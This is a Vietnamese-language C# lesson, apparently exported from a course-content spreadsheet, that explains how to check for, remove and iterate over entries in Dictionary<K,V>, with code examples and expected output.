ContainsKey() là phương thức dùng để kiểm tra xem một khóa (key) cụ thể có tồn tại trong Dictionary hay không. Phương thức này trả về true nếu khóa tồn tại và false nếu không. Đây là cách an toàn và được khuyến nghị để kiểm tra trước khi cố gắng truy cập một phần tử, giúp bạn tránh được lỗi KeyNotFoundException.
Ví dụ:
using System;
using System.Collections.Generic;
public class Program
{
    public static void Main(string[] args)
    {
        Dictionary&lt;string, int&gt; diemSinhVien = new Dictionary&lt;string, int&gt;()
        {
            { "Nguyen Van A", 85 },
            { "Tran Thi B", 92 },
            { "Le Van C", 78 }
        };
        // Kiểm tra sự tồn tại của một sinh viên
        string tenSinhVienCanTim1 = "Nguyen Van A";
        if (diemSinhVien.ContainsKey(tenSinhVienCanTim1))
        {
            Console.WriteLine($"Sinh viên '{tenSinhVienCanTim1}' có trong danh sách với điểm số: {diemSinhVien[tenSinhVienCanTim1]}");
        }
        else
        {
            Console.WriteLine($"Sinh viên '{tenSinhVienCanTim1}' không có trong danh sách.");
        }
        string tenSinhVienCanTim2 = "Pham Minh D";
        if (diemSinhVien.ContainsKey(tenSinhVienCanTim2))
        {
            Console.WriteLine($"Sinh viên '{tenSinhVienCanTim2}' có trong danh sách với điểm số: {diemSinhVien[tenSinhVienCanTim2]}");
        }
        else
        {
            Console.WriteLine($"Sinh viên '{tenSinhVienCanTim2}' không có trong danh sách.");
        }
    }
}
Trong ví dụ trên, chúng ta sử dụng ContainsKey() để kiểm tra xem "Nguyen Van A" và "Pham Minh D" có trong diemSinhVien hay không trước khi cố gắng truy cập điểm số của họ.
Phương thức ContainsValue()
Tương tự như ContainsKey(), phương thức ContainsValue() được sử dụng để kiểm tra xem một giá trị (value) cụ thể có tồn tại trong bất kỳ cặp khóa-giá trị nào của Dictionary hay không. Phương thức này cũng trả về true hoặc false.
Lưu ý: Vì Dictionary được tối ưu hóa cho việc tìm kiếm theo khóa, việc sử dụng ContainsValue() có thể kém hiệu quả hơn ContainsKey() đối với các Dictionary lớn, vì nó thường phải duyệt qua tất cả các giá trị để tìm kiếm.
Ví dụ:
using System;
using System.Collections.Generic;
public class Program
{
    public static void Main(string[] args)
    {
        Dictionary&lt;string, int&gt; diemSinhVien = new Dictionary&lt;string, int&gt;()
        {
            { "Nguyen Van A", 85 },
            { "Tran Thi B", 92 },
            { "Le Van C", 78 }
        };
        // Kiểm tra sự tồn tại của một điểm số
        int diemCanTim1 = 92;
        if (diemSinhVien.ContainsValue(diemCanTim1))
        {
            Console.WriteLine($"Có sinh viên đạt điểm {diemCanTim1} trong danh sách.");
        }
        else
        {
            Console.WriteLine($"Không có sinh viên nào đạt điểm {diemCanTim1} trong danh sách.");
        }
        int diemCanTim2 = 100;
        if (diemSinhVien.ContainsValue(diemCanTim2))
        {
            Console.WriteLine($"Có sinh viên đạt điểm {diemCanTim2} trong danh sách.");
        }
        else
        {
            Console.WriteLine($"Không có sinh viên nào đạt điểm {diemCanTim2} trong danh sách.");
        }
    }
}
Truy cập an toàn với TryGetValue()
Phương thức TryGetValue() là một cách thay thế hiệu quả và an toàn để vừa kiểm tra sự tồn tại của khóa, vừa lấy giá trị tương ứng nếu khóa đó tồn tại. Nó trả về true nếu khóa được tìm thấy và gán giá trị của nó vào tham số out được cung cấp. Nếu khóa không tồn tại, nó trả về false và gán giá trị mặc định của kiểu giá trị (default(TValue)) vào tham số out.
Ưu điểm của TryGetValue() là nó chỉ thực hiện một lần tìm kiếm để vừa kiểm tra, vừa lấy giá trị, hiệu quả hơn so với việc gọi ContainsKey() rồi sau đó truy cập bằng toán tử [].
Ví dụ:
using System;
using System.Collections.Generic;
public class Program
{
    public static void Main(string[] args)
    {
        Dictionary&lt;string, int&gt; diemSinhVien = new Dictionary&lt;string, int&gt;()
        {
            { "Nguyen Van A", 85 },
            { "Tran Thi B", 92 },
            { "Le Van C", 78 }
        };
        // Sử dụng TryGetValue để lấy điểm của sinh viên
        string tenSinhVien1 = "Tran Thi B";
        if (diemSinhVien.TryGetValue(tenSinhVien1, out int diem1))
        {
            Console.WriteLine($"Điểm của '{tenSinhVien1}' là: {diem1}");
        }
        else
        {
            Console.WriteLine($"Sinh viên '{tenSinhVien1}' không tồn tại trong danh sách.");
        }
        string tenSinhVien2 = "Dang Van E";
        if (diemSinhVien.TryGetValue(tenSinhVien2, out int diem2))
        {
            Console.WriteLine($"Điểm của '{tenSinhVien2}' là: {diem2}");
        }
        else
        {
            Console.WriteLine($"Sinh viên '{tenSinhVien2}' không tồn tại trong danh sách.");
        }
    }
}
Xóa phần tử khỏi Dictionary
Khi bạn không còn cần một cặp khóa-giá trị cụ thể, bạn có thể xóa nó khỏi Dictionary bằng phương thức Remove().
Phương thức Remove()
Phương thức Remove() nhận một khóa làm đối số và cố gắng xóa cặp khóa-giá trị tương ứng. Nó trả về true nếu phần tử được tìm thấy và xóa thành công, và false nếu khóa không tồn tại trong Dictionary (trong trường hợp này, không có gì được xóa).
Ví dụ:
using System;
using System.Collections.Generic;
public class Program
{
    public static void Main(string[] args)
    {
        Dictionary&lt;string, int&gt; diemSinhVien = new Dictionary&lt;string, int&gt;()
        {
            { "Nguyen Van A", 85 },
            { "Tran Thi B", 92 },
            { "Le Van C", 78 }
        };
        Console.WriteLine("Danh sách ban đầu:");
        foreach (var sv in diemSinhVien)
        {
            Console.WriteLine($"- {sv.Key}: {sv.Value}");
        }
        Console.WriteLine();
        // Xóa một sinh viên đã có
        string svCanXoa1 = "Tran Thi B";
        if (diemSinhVien.Remove(svCanXoa1))
        {
            Console.WriteLine($"Đã xóa sinh viên '{svCanXoa1}' khỏi danh sách.");
        }
        else
        {
            Console.WriteLine($"Không tìm thấy sinh viên '{svCanXoa1}' để xóa.");
        }
        // Xóa một sinh viên không có
        string svCanXoa2 = "Pham Minh D";
        if (diemSinhVien.Remove(svCanXoa2))
        {
            Console.WriteLine($"Đã xóa sinh viên '{svCanXoa2}' khỏi danh sách.");
        }
        else
        {
            Console.WriteLine($"Không tìm thấy sinh viên '{svCanXoa2}' để xóa.");
        }
        Console.WriteLine("\nDanh sách sau khi xóa:");
        foreach (var sv in diemSinhVien)
        {
            Console.WriteLine($"- {sv.Key}: {sv.Value}");
        }
    }
}
Xóa toàn bộ nội dung với Clear()
Đôi khi bạn muốn xóa tất cả các phần tử khỏi một Dictionary để bắt đầu lại với một bộ sưu tập trống. Phương thức Clear() thực hiện chính xác điều này. Nó không nhận đối số và không trả về giá trị.
Ví dụ:
using System;
using System.Collections.Generic;
public class Program
{
    public static void Main(string[] args)
    {
        Dictionary&lt;string, int&gt; danhSachMonHoc = new Dictionary&lt;string, int&gt;()
        {
            { "Toan", 101 },
            { "Ly", 102 },
            { "Hoa", 103 }
        };
        Console.WriteLine($"Số lượng môn học ban đầu: {danhSachMonHoc.Count}");
        // Xóa tất cả các phần tử
        danhSachMonHoc.Clear();
        Console.WriteLine($"Số lượng môn học sau khi xóa: {danhSachMonHoc.Count}");
        if (danhSachMonHoc.Count == 0)
        {
            Console.WriteLine("Dictionary hiện đã trống.");
        }
    }
}
Tóm tắt và Lựa chọn Phương pháp
Bạn đã học được các công cụ cần thiết để kiểm tra sự tồn tại và quản lý việc xóa phần tử trong Dictionary&lt;K,V&gt;:
Sử dụng ContainsKey() để kiểm tra sự tồn tại của khóa trước khi truy cập bằng toán tử [], giúp tránh KeyNotFoundException.
Sử dụng ContainsValue() khi bạn cần kiểm tra xem một giá trị cụ thể có trong Dictionary hay không, nhưng hãy lưu ý về hiệu suất đối với các tập dữ liệu lớn.
Sử dụng TryGetValue() để truy cập giá trị an toàn và hiệu quả hơn, đặc biệt khi bạn cần cả việc kiểm tra và lấy giá trị nếu khóa tồn tại.
Sử dụng Remove(key) để xóa một cặp khóa-giá trị cụ thể.
Sử dụng Clear() để xóa tất cả các phần tử, làm trống Dictionary.
Việc lựa chọn phương thức phù hợp sẽ giúp code của bạn an toàn hơn, dễ đọc hơn và hiệu quả hơn khi làm việc với Dictionary.</t>
        </is>
      </c>
      <c r="W10" s="22" t="inlineStr">
        <is>
          <t># Kiểm tra sự tồn tại và Xóa phần tử trong Dictionary&lt;K,V&gt;
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích vì sao đọc một khóa không tồn tại bằng `[]` gây ra `KeyNotFoundException`.
- Dùng `ContainsKey()` và `TryGetValue()` để kiểm tra khóa một cách an toàn.
- Phân biệt `ContainsKey()` (theo khóa, nhanh) với `ContainsValue()` (theo giá trị, phải duyệt).
- Xóa phần tử bằng `Remove()` và `Clear()`, hiểu giá trị `bool` mà `Remove()` trả về.
- Quan sát từng bước chạy của `ContainsKey`, `ContainsValue` và `Remove` bằng hoạt động mô phỏng.
## Vì sao cần kiểm tra trước khi truy cập
`Dictionary&lt;TKey, TValue&gt;` lưu dữ liệu theo cặp **khóa - giá trị**. Hãy hình dung một chiếc tủ có nhiều ngăn kéo: mỗi ngăn có một nhãn (khóa) và đồ bên trong (giá trị).
Nếu bạn đọc một khóa không có bằng toán tử `[]`, chương trình ném `KeyNotFoundException` và dừng lại. Vì vậy, khi không chắc khóa có tồn tại, hãy kiểm tra trước.
Các ví dụ trong bài dùng một kho văn phòng phẩm: bút 10 cái, vở 5 quyển, thước 3 cái.
```csharp
using System;
using System.Collections.Generic;
public class Program
{
    public static void Main()
    {
        var stock = new Dictionary&lt;string, int&gt;
        {
            ["bút"] = 10,
            ["vở"] = 5,
            ["thước"] = 3
        };
        // int n = stock["kéo"];   // ném KeyNotFoundException vì không có khóa "kéo"
        Console.WriteLine(stock.Count);   // 3
    }
}
```
## Kiểm tra khóa với ContainsKey()
`ContainsKey(key)` trả về `true` nếu khóa có trong Dictionary, ngược lại trả về `false`. Khóa không có chỉ cho kết quả `false`, **không gây lỗi**.
`ContainsKey()` rất nhanh: Dictionary đi thẳng tới ngăn có nhãn đó, không cần mở các ngăn khác.
```csharp
bool a = stock.ContainsKey("vở");    // true
bool b = stock.ContainsKey("kéo");   // false
```
## Kiểm tra giá trị với ContainsValue()
`ContainsValue(value)` cho biết có ít nhất một cặp nào mang giá trị đó hay không.
```csharp
bool c = stock.ContainsValue(5);   // true
```
Dictionary được tổ chức để tìm theo khóa, không theo giá trị. Vì vậy `ContainsValue()` phải **duyệt lần lượt từng phần tử**. Nếu giá trị không có, nó phải duyệt hết. Dictionary càng lớn thì càng chậm, nên chỉ dùng khi thật sự cần.
## Lấy giá trị an toàn với TryGetValue()
Nếu bạn muốn vừa kiểm tra vừa lấy giá trị, dùng `TryGetValue(key, out value)`:
```csharp
if (stock.TryGetValue("vở", out int soLuong))
{
    Console.WriteLine($"Còn {soLuong} quyển vở.");   // Còn 5 quyển vở.
}
else
{
    Console.WriteLine("Không có mặt hàng này.");
}
```
Phương thức trả về `true` và gán giá trị vào `soLuong` khi tìm thấy khóa. Nếu không tìm thấy, nó trả về `false` và `soLuong` nhận giá trị mặc định (`0` với `int`). Cách này chỉ tra khóa **một lần**, gọn hơn việc gọi `ContainsKey()` rồi đọc bằng `[]`.
## Xóa phần tử
### Remove()
`Remove(key)` xóa cặp có khóa tương ứng và trả về `bool`:
- `true`: có cặp để xóa và đã xóa xong.
- `false`: không có khóa đó, không xóa gì và **không báo lỗi**.
```csharp
bool r1 = stock.Remove("bút");    // true, Count còn 2
bool r2 = stock.Remove("kéo");    // false, Count vẫn là 2
```
Có thêm phiên bản `Remove(key, out value)` vừa xóa vừa trả lại giá trị của cặp vừa bị xóa:
```csharp
bool r3 = stock.Remove("vở", out int old);
// r3 = true, old = 5, Count còn 1 (chỉ còn "thước")
```
### Clear()
`Clear()` xóa tất cả phần tử, không nhận tham số và không trả về giá trị. Sau đó `Count` bằng 0.
```csharp
stock.Clear();
Console.WriteLine(stock.Count);   // 0
```
## Hoạt động: Kiểm tra và xóa trong tủ ngăn kéo
Mô phỏng dưới đây là một chiếc tủ ba ngăn: bút 10, vở 5, thước 3. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **ContainsKey**. Hỏi tủ có ngăn "vở" không: Dictionary đi thẳng tới ngăn "vở" chỉ sau 1 lần tra và trả về `a = true`. Sau đó hỏi ngăn "kéo": không ngăn nào mang nhãn này, nên `b = false` và không có lỗi nào xảy ra.
- Chuyển sang tab **ContainsValue**. Lần này ta không biết nhãn, chỉ tìm giá trị 5. Các ngăn được mở lần lượt: "bút" chứa 10 (khác 5) nên mở tiếp, "vở" chứa 5 nên dừng. Bộ đếm cho thấy phải mở 2 trên 3 ngăn. Nếu giá trị không có, phải mở hết cả 3 ngăn.
- Mở tab **Remove**. `Remove("bút")` đánh dấu ngăn "bút" rồi bỏ đi, trả về `r1 = true`, `Count` giảm còn 2. `Remove("kéo")` trả về `r2 = false`, `Count` vẫn là 2. Cuối cùng `Remove("vở", out int old)` bỏ ngăn "vở" và lưu giá trị `old = 5`, `Count` còn 1, chỉ còn ngăn "thước".
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/gioi-thieu-ve-dictionary-k-v/kiem-tra-su-ton-tai-va-xoa-phan-tu-trong-dictionary-k-v/" title="Kiểm tra tồn tại và xóa trong Dictionary" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: `ContainsKey()` đi thẳng tới ngăn nên nhanh, còn `ContainsValue()` phải mở từng ngăn nên chậm dần khi dữ liệu lớn. `Remove()` với khóa không có chỉ trả về `false`, không gây lỗi.
&gt; **Lưu ý:** Đừng dùng `ContainsKey()` rồi `[]` khi bạn cần giá trị. `TryGetValue()` làm cả hai việc trong một lần tra.
## Tóm tắt
- Đọc khóa không có bằng `[]` ném `KeyNotFoundException`, nên hãy kiểm tra trước.
- `ContainsKey()` kiểm tra theo khóa, nhanh. Khóa không có chỉ trả về `false`.
- `ContainsValue()` phải duyệt từng phần tử nên chậm hơn khi Dictionary lớn.
- `TryGetValue()` vừa kiểm tra vừa lấy giá trị, chỉ tra một lần.
- `Remove(key)` trả về `true` nếu đã xóa, `false` nếu không có khóa. `Remove(key, out value)` lấy luôn giá trị vừa xóa.
- `Clear()` xóa toàn bộ phần tử, sau đó `Count` bằng 0.</t>
        </is>
      </c>
    </row>
    <row r="11" ht="409.6" customHeight="1" s="18">
      <c r="A11" s="10" t="n">
        <v>10</v>
      </c>
      <c r="B11" s="10" t="inlineStr">
        <is>
          <t>1. Cấu trúc dữ liệu nâng cao: Collections</t>
        </is>
      </c>
      <c r="C11" s="10" t="inlineStr">
        <is>
          <t>Thao tác nâng cao với Dictionary&lt;K,V&gt; và lựa chọn Collections</t>
        </is>
      </c>
      <c r="D11" s="10" t="inlineStr">
        <is>
          <t>Duyệt qua Dictionary&lt;K,V&gt;</t>
        </is>
      </c>
      <c r="E11" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F11" s="13" t="inlineStr">
        <is>
          <t>Làm thêm nếu muốn</t>
        </is>
      </c>
      <c r="G11" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H11" s="10" t="inlineStr">
        <is>
          <t>Thấy mỗi lần lặp foreach nhận một cặp KeyValuePair, và cách duyệt riêng Keys hoặc Values.</t>
        </is>
      </c>
      <c r="I11" s="10" t="inlineStr">
        <is>
          <t>1 cột, 3 tab</t>
        </is>
      </c>
      <c r="J11" s="10" t="inlineStr">
        <is>
          <t>Tủ ngăn kéo với con trỏ duyệt; thẻ 'kv' hiện Key và Value của lần lặp hiện tại; console in dần.</t>
        </is>
      </c>
      <c r="K11" s="10" t="inlineStr">
        <is>
          <t>H02</t>
        </is>
      </c>
      <c r="L11" s="10" t="inlineStr">
        <is>
          <t>foreach KeyValuePair | Keys | Values</t>
        </is>
      </c>
      <c r="M11" s="10" t="inlineStr">
        <is>
          <t>foreach (var kv in scores): lần 1 kv.Key = "An", kv.Value = 8 ... in từng dòng.
Keys: duyệt chỉ các khóa, in danh sách tên.
Values: duyệt chỉ giá trị, tính tổng và điểm trung bình (tính từ dữ liệu).
Bước cuối: ghi chú thứ tự duyệt.</t>
        </is>
      </c>
      <c r="N11" s="10" t="inlineStr">
        <is>
          <t>scores: An 8, Bình 6, Chi 9</t>
        </is>
      </c>
      <c r="O11" s="10" t="inlineStr">
        <is>
          <t>foreach trên Dictionary trả về từng cặp khóa – giá trị. Thứ tự duyệt không được bảo đảm.</t>
        </is>
      </c>
      <c r="P11" s="10" t="inlineStr">
        <is>
          <t>Thứ tự duyệt thường trùng thứ tự thêm nhưng tài liệu không bảo đảm; cần thứ tự thì dùng SortedDictionary hoặc OrderBy.</t>
        </is>
      </c>
      <c r="Q11" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/thao-tac-nang-cao-voi-dictionary-k-v-va-lua-chon-collections/duyet-qua-dictionary-k-v/index.html</t>
        </is>
      </c>
      <c r="R11" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/cau-truc-du-lieu-nang-cao-collections/thao-tac-nang-cao-voi-dictionary-k-v-va-lua-chon-collections/duyet-qua-dictionary-k-v/</t>
        </is>
      </c>
      <c r="S11" s="10" t="n"/>
      <c r="T11" s="12" t="n"/>
      <c r="U11" s="12" t="n"/>
      <c r="V11" s="21" t="inlineStr">
        <is>
          <t>Trong C#, Dictionary&lt;K,V&gt; là một cấu trúc dữ liệu mạnh mẽ để lưu trữ các cặp khóa-giá trị, cho phép truy cập dữ liệu nhanh chóng dựa trên khóa. Tuy nhiên, để tận dụng tối đa Dictionary, bạn cần biết cách duyệt qua các phần tử của nó một cách hiệu quả. Trang này sẽ hướng dẫn bạn các phương pháp phổ biến và mạnh mẽ để thực hiện điều đó.
Duyệt qua tất cả các Khóa (Keys)
Đôi khi, bạn chỉ cần xử lý các khóa trong Dictionary mà không cần quan tâm đến giá trị tương ứng. Dictionary&lt;K,V&gt; cung cấp thuộc tính Keys, trả về một tập hợp các khóa (Dictionary&lt;K,V&gt;.KeyCollection) mà bạn có thể duyệt qua.
Việc duyệt qua các khóa rất hữu ích khi bạn muốn:
Kiểm tra sự tồn tại của một tập hợp các khóa cụ thể.
Tạo một danh sách các khóa duy nhất.
Thực hiện các thao tác chỉ dựa trên thông tin khóa.
using System;
using System.Collections.Generic;
public class DuyetQuaKeys
{
    public static void Main(string[] args)
    {
        Dictionary&lt;string, int&gt; diemMonHoc = new Dictionary&lt;string, int&gt;()
        {
            { "Toan", 90 },
            { "Ly", 85 },
            { "Hoa", 92 },
            { "Van", 78 }
        };
        Console.WriteLine("Danh sách các môn học (khóa):");
        foreach (string monHoc in diemMonHoc.Keys)
        {
            Console.WriteLine($"- {monHoc}");
        }
    }
}
Kết quả của đoạn code trên sẽ là:
Danh sách các môn học (khóa):
- Toan
- Ly
- Hoa
- Van
Duyệt qua tất cả các Giá trị (Values)
Tương tự như việc duyệt qua các khóa, bạn cũng có thể chỉ muốn làm việc với các giá trị được lưu trữ trong Dictionary. Thuộc tính Values của Dictionary&lt;K,V&gt; trả về một tập hợp các giá trị (Dictionary&lt;K,V&gt;.ValueCollection), cho phép bạn truy cập tất cả các giá trị mà không cần khóa.
Phương pháp này hữu ích khi bạn cần:
Tính tổng, trung bình hoặc các thống kê khác từ các giá trị.
Lọc hoặc biến đổi các giá trị.
Kiểm tra sự tồn tại của một giá trị cụ thể.
using System;
using System.Collections.Generic;
public class DuyetQuaValues
{
    public static void Main(string[] args)
    {
        Dictionary&lt;string, int&gt; diemMonHoc = new Dictionary&lt;string, int&gt;()
        {
            { "Toan", 90 },
            { "Ly", 85 },
            { "Hoa", 92 },
            { "Van", 78 }
        };
        Console.WriteLine("\nDanh sách các điểm số (giá trị):");
        foreach (int diem in diemMonHoc.Values)
        {
            Console.WriteLine($"- {diem}");
        }
        // Ví dụ: Tính tổng điểm
        int tongDiem = 0;
        foreach (int diem in diemMonHoc.Values)
        {
            tongDiem += diem;
        }
        Console.WriteLine($"\nTổng điểm của các môn: {tongDiem}");
    }
}
Kết quả của đoạn code trên sẽ là:
Danh sách các điểm số (giá trị):
- 90
- 85
- 92
- 78
Tổng điểm của các môn: 345
Duyệt qua cả Cặp Khóa-Giá trị (Key-Value Pairs)
Trong nhiều trường hợp, bạn cần truy cập cả khóa và giá trị tương ứng của nó trong mỗi lần lặp. Dictionary&lt;K,V&gt; triển khai giao diện IEnumerable&lt;KeyValuePair&lt;K,V&gt;&gt;, cho phép bạn duyệt qua từng cặp khóa-giá trị bằng vòng lặp foreach. Mỗi phần tử trong vòng lặp sẽ là một đối tượng KeyValuePair&lt;K,V&gt;, có hai thuộc tính: Key và Value.
Đây là phương pháp phổ biến nhất khi bạn cần xử lý mối quan hệ giữa khóa và giá trị.
using System;
using System.Collections.Generic;
public class DuyetQuaKeyValuePair
{
    public static void Main(string[] args)
    {
        Dictionary&lt;string, int&gt; diemMonHoc = new Dictionary&lt;string, int&gt;()
        {
            { "Toan", 90 },
            { "Ly", 85 },
            { "Hoa", 92 },
            { "Van", 78 }
        };
        Console.WriteLine("\nThông tin điểm các môn học:");
        foreach (KeyValuePair&lt;string, int&gt; capDiem in diemMonHoc)
        {
            Console.WriteLine($"Môn: {capDiem.Key}, Điểm: {capDiem.Value}");
        }
        // Ví dụ: Tìm môn học có điểm cao nhất
        string monDiemCaoNhat = "";
        int diemCaoNhat = -1; // Giả sử điểm không âm
        foreach (KeyValuePair&lt;string, int&gt; capDiem in diemMonHoc)
        {
            if (capDiem.Value &gt; diemCaoNhat)
            {
                diemCaoNhat = capDiem.Value;
                monDiemCaoNhat = capDiem.Key;
            }
        }
        Console.WriteLine($"\nMôn học có điểm cao nhất là: {monDiemCaoNhat} ({diemCaoNhat} điểm)");
    }
}
Kết quả của đoạn code trên sẽ là:
Thông tin điểm các môn học:
Môn: Toan, Điểm: 90
Môn: Ly, Điểm: 85
Môn: Hoa, Điểm: 92
Môn: Van, Điểm: 78
Môn học có điểm cao nhất là: Hoa (92 điểm)
Sử dụng LINQ để Truy vấn và Duyệt Dictionary
Language Integrated Query (LINQ) cung cấp một cú pháp mạnh mẽ và linh hoạt để truy vấn các tập hợp dữ liệu, bao gồm cả Dictionary&lt;K,V&gt;. Với LINQ, bạn có thể lọc, sắp xếp, nhóm và biến đổi dữ liệu trong Dictionary một cách dễ dàng và biểu cảm hơn so với các vòng lặp truyền thống. Khi bạn sử dụng LINQ, các phương thức mở rộng (extension methods) như Where(), Select(), OrderBy() sẽ hoạt động trên các cặp KeyValuePair&lt;K,V&gt;.
LINQ đặc biệt hữu ích khi bạn cần:
Lọc các phần tử dựa trên điều kiện của khóa hoặc giá trị.
Sắp xếp Dictionary theo khóa hoặc giá trị.
Chuyển đổi Dictionary thành một cấu trúc dữ liệu khác (ví dụ: List&lt;T&gt;).
Thực hiện các phép chiếu (projection) để chỉ lấy một phần của dữ liệu.
using System;
using System.Collections.Generic;
using System.Linq; // Quan trọng: cần thêm using System.Linq
public class DuyetQuaDictionaryVoiLINQ
{
    public static void Main(string[] args)
    {
        Dictionary&lt;string, int&gt; diemMonHoc = new Dictionary&lt;string, int&gt;()
        {
            { "Toan", 90 },
            { "Ly", 85 },
            { "Hoa", 92 },
            { "Van", 78 },
            { "Anh", 90 }
        };
        Console.WriteLine("--- Các môn có điểm từ 90 trở lên (sử dụng LINQ.Where) ---");
        var monHocDiemCao = diemMonHoc.Where(cap =&gt; cap.Value &gt;= 90);
        foreach (var cap in monHocDiemCao)
        {
            Console.WriteLine($"Môn: {cap.Key}, Điểm: {cap.Value}");
        }
        Console.WriteLine("\n--- Các môn học được sắp xếp theo tên (sử dụng LINQ.OrderBy) ---");
        var monHocSapXepTheoTen = diemMonHoc.OrderBy(cap =&gt; cap.Key);
        foreach (var cap in monHocSapXepTheoTen)
        {
            Console.WriteLine($"Môn: {cap.Key}, Điểm: {cap.Value}");
        }
        Console.WriteLine("\n--- Chỉ lấy tên các môn học (sử dụng LINQ.Select) ---");
        var tenMonHoc = diemMonHoc.Select(cap =&gt; cap.Key);
        foreach (var ten in tenMonHoc)
        {
            Console.WriteLine($"- {ten}");
        }
        Console.WriteLine("\n--- Chuyển đổi sang List các object ẩn danh (sử dụng LINQ.Select) ---");
        var danhSachMonHoc = diemMonHoc.Select(cap =&gt; new { TenMon = cap.Key, DiemSo = cap.Value }).ToList();
        foreach (var mon in danhSachMonHoc)
        {
            Console.WriteLine($"Môn: {mon.TenMon}, Điểm: {mon.DiemSo}");
        }
    }
}
Kết quả của đoạn code trên sẽ là:
--- Các môn có điểm từ 90 trở lên (sử dụng LINQ.Where) ---
Môn: Toan, Điểm: 90
Môn: Hoa, Điểm: 92
Môn: Anh, Điểm: 90
--- Các môn học được sắp xếp theo tên (sử dụng LINQ.OrderBy) ---
Môn: Anh, Điểm: 90
Môn: Hoa, Điểm: 92
Môn: Ly, Điểm: 85
Môn: Toan, Điểm: 90
Môn: Van, Điểm: 78
--- Chỉ lấy tên các môn học (sử dụng LINQ.Select) ---
- Toan
- Ly
- Hoa
- Van
- Anh
--- Chuyển đổi sang List các object ẩn danh (sử dụng LINQ.Select) ---
Môn: Toan, Điểm: 90
Môn: Ly, Điểm: 85
Môn: Hoa, Điểm: 92
Môn: Van, Điểm: 78
Môn: Anh, Điểm: 90
Tổng kết
Việc lựa chọn phương pháp duyệt Dictionary&lt;K,V&gt; phụ thuộc vào nhu cầu cụ thể của bạn:
Sử dụng Dictionary.Keys khi bạn chỉ cần xử lý các khóa.
Sử dụng Dictionary.Values khi bạn chỉ cần xử lý các giá trị.
Sử dụng vòng lặp foreach với KeyValuePair&lt;K,V&gt; khi bạn cần truy cập cả khóa và giá trị cùng lúc và thực hiện các thao tác đơn giản.
Sử dụng LINQ khi bạn cần các truy vấn phức tạp hơn như lọc, sắp xếp, hoặc biến đổi dữ liệu, mang lại mã nguồn ngắn gọn và dễ đọc hơn.
Việc nắm vững các kỹ thuật này sẽ giúp bạn thao tác với Dictionary một cách hiệu quả và linh hoạt trong các ứng dụng C#.</t>
        </is>
      </c>
      <c r="W11" s="22" t="inlineStr">
        <is>
          <t># Duyệt qua Dictionary&lt;K,V&gt;
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Dùng `foreach` để duyệt từng cặp `KeyValuePair&lt;TKey, TValue&gt;` của Dictionary.
- Duyệt riêng các khóa bằng `Keys` và riêng các giá trị bằng `Values`.
- Chọn cách duyệt phù hợp với nhu cầu: cần cả khóa lẫn giá trị, chỉ khóa, hay chỉ giá trị.
- Nhớ rằng thứ tự duyệt của Dictionary không được bảo đảm.
- Quan sát từng lần lặp của ba cách duyệt bằng hoạt động mô phỏng.
## Ba cách duyệt Dictionary
Dictionary lưu dữ liệu theo cặp khóa - giá trị, nên bạn có ba lựa chọn khi duyệt:
| Cách duyệt | Mỗi lần lặp nhận | Dùng khi |
|---|---|---|
| `foreach (var kv in dict)` | một `KeyValuePair` | cần cả khóa và giá trị |
| `foreach (var k in dict.Keys)` | một khóa | chỉ cần các khóa |
| `foreach (var v in dict.Values)` | một giá trị | chỉ cần các giá trị |
Các ví dụ dưới đây dùng một bảng điểm ba học sinh:
```csharp
using System;
using System.Collections.Generic;
public class Program
{
    public static void Main()
    {
        var scores = new Dictionary&lt;string, int&gt;
        {
            ["An"] = 8,
            ["Bình"] = 6,
            ["Chi"] = 9
        };
    }
}
```
## Duyệt từng cặp khóa - giá trị
`Dictionary&lt;TKey, TValue&gt;` cài đặt `IEnumerable&lt;KeyValuePair&lt;TKey, TValue&gt;&gt;`, nên `foreach` trực tiếp trên Dictionary sẽ trả về từng **cặp**. Mỗi `KeyValuePair` có hai thuộc tính: `Key` và `Value`.
```csharp
foreach (var kv in scores)
{
    Console.WriteLine(kv.Key + ": " + kv.Value);
}
// An: 8
// Bình: 6
// Chi: 9
```
Đây là cách duyệt phổ biến nhất vì bạn nhìn thấy cả hai phần của mỗi cặp.
## Duyệt các khóa với Keys
Thuộc tính `Keys` là tập hợp chỉ gồm các khóa. Giá trị không xuất hiện.
```csharp
foreach (string k in scores.Keys)
{
    Console.WriteLine(k);
}
// An
// Bình
// Chi
```
Cách này hợp khi bạn chỉ cần danh sách tên, hoặc muốn xử lý theo khóa.
## Duyệt các giá trị với Values
Thuộc tính `Values` là tập hợp chỉ gồm các giá trị. Cách này tiện để tính tổng hoặc trung bình:
```csharp
int sum = 0;
foreach (int v in scores.Values)
{
    sum += v;
}
double avg = (double)sum / scores.Count;
Console.WriteLine(avg.ToString("F2"));   // 7.67
```
Tổng là 8 + 6 + 9 = 23, chia cho 3 học sinh ra 7.67.
## Lưu ý về thứ tự và khi sửa trong lúc duyệt
- Thứ tự duyệt thường trùng với thứ tự thêm vào, nhưng **không được bảo đảm**. Nếu cần thứ tự cố định, dùng `SortedDictionary` hoặc sắp xếp bằng LINQ `OrderBy`.
- Không thêm hoặc xóa phần tử của Dictionary bên trong vòng `foreach` đang duyệt chính nó, vì sẽ gây `InvalidOperationException`. Hãy thu thập các khóa cần xóa vào một danh sách rồi xóa sau khi duyệt xong.
## Hoạt động: Ba cách duyệt bảng điểm
Mô phỏng dưới đây dùng bảng điểm ba ngăn: An 8, Bình 6, Chi 9. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **foreach KeyValuePair**. Qua ba lần lặp, mỗi lần `foreach` lấy ra một cặp: `kv.Key = "An"`, `kv.Value = 8`, rồi "Bình" với 6, rồi "Chi" với 9. Thẻ `kv (KeyValuePair)` hiện hai dòng Key và Value, ngăn đang xét được tô sáng và các ngăn đã duyệt chuyển sang màu xanh. Mỗi lần lặp in ra một dòng như `An: 8`.
